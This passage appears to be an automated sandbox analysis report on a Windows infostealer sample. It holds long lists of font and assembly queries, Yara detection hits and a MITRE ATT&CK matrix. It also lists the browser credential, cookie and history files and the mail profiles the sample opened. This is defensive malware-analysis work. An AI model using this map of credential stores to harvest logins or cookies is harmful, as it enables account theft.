Source: C:\Users\user\Desktop\file.exe    Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\file.exe    Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe    Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe    Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe    Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\file.exe    Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe    Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe    Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe    Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\file.exe    Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe    Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe    Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe    Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe    Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe    Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe    Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe    Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe    Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe    Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe    Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe    Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe    Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe    Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe    Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe    Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe    Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe    Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe    Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe    Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe    Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe    Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe    Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe    Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe    Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe    Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe    Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe    Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe    Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe    Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe    Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe    Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe    Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe    Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe    Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe    Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe    Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe    Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe    Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe    Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe    Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe    Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe    Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe    Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe    Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe    Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe    Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe    Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe    Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe    Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe    Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe    Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Desktop\file.exe    Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\file.exe    Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\file.exe    Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe    Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe    Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe    Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe    Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe    Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe    Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\Desktop\file.exe    Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\Desktop\file.exe    Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\file.exe    Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: Amcache.hve.5.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                Source: Amcache.hve.5.drBinary or memory string: msmpeng.exe
                Source: Amcache.hve.5.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                Source: Amcache.hve.5.drBinary or memory string: MsMpEng.exe

                Stealing of Sensitive Information

                Source: Yara match | File source: 00000002.00000002.4144889269.0000000003091000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0.2.file.exe.3c2d060.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.file.exe.3c70280.3.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.file.exe.3c70280.3.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.file.exe.3c2d060.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000002.00000002.4143324040.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1826174186.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: file.exe PID: 7568, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: file.exe PID: 7692, type: MEMORYSTR
                Source: Yara match | File source: 0.2.file.exe.3c2d060.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.file.exe.3c70280.3.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.file.exe.3c70280.3.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.file.exe.3c2d060.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000002.00000002.4143324040.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1826174186.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: file.exe PID: 7568, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: file.exe PID: 7692, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
                Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: Yara match | File source: 0.2.file.exe.3c2d060.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.file.exe.3c70280.3.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.file.exe.3c70280.3.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.file.exe.3c2d060.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000002.00000002.4143324040.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.4144889269.000000000319A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1826174186.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: file.exe PID: 7568, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: file.exe PID: 7692, type: MEMORYSTR

                Remote Access Functionality

                Source: Yara match | File source: 00000002.00000002.4144889269.0000000003091000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0.2.file.exe.3c2d060.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.file.exe.3c70280.3.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.file.exe.3c70280.3.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.file.exe.3c2d060.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000002.00000002.4143324040.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1826174186.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: file.exe PID: 7568, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: file.exe PID: 7692, type: MEMORYSTR
                Source: Yara match | File source: 0.2.file.exe.3c2d060.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.file.exe.3c70280.3.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.file.exe.3c70280.3.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.file.exe.3c2d060.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000002.00000002.4143324040.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1826174186.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: file.exe PID: 7568, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: file.exe PID: 7692, type: MEMORYSTR

                MITRE ATT&CK matrix (one line per tactic column; a number in front of a technique is the count shown with it on the page):

                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
                Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
                Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
                Execution: Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
                Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
                Privilege Escalation: 111 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
                Defense Evasion: 1 Masquerading; 1 Disable or Modify Tools; 41 Virtualization/Sandbox Evasion; 111 Process Injection; 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading
                Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
